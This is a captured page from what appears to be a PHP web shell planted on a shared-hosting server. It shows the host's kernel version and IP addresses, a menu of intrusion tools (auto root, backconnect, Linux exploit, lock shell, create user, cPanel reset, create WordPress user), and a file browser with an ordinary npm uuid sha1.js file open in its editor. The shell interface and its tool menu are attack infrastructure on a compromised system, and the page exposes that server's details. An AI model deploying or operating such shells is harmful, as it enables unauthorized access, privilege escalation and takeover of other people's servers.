Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.145.16.81
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
uuid /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
bytesToUuid.js
747
B
-rw-r--r--
md5-browser.js
6.66
KB
-rw-r--r--
md5.js
576
B
-rw-r--r--
rng-browser.js
1.28
KB
-rw-r--r--
rng.js
246
B
-rw-r--r--
sha1-browser.js
2.28
KB
-rw-r--r--
sha1.js
579
B
-rw-r--r--
v35.js
1.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sha1.js
'use strict'; var crypto = require('crypto'); function sha1(bytes) { if (typeof Buffer.from === 'function') { // Modern Buffer API if (Array.isArray(bytes)) { bytes = Buffer.from(bytes); } else if (typeof bytes === 'string') { bytes = Buffer.from(bytes, 'utf8'); } } else { // Pre-v4 Buffer API if (Array.isArray(bytes)) { bytes = new Buffer(bytes); } else if (typeof bytes === 'string') { bytes = new Buffer(bytes, 'utf8'); } } return crypto.createHash('sha1').update(bytes).digest(); } module.exports = sha1;
Close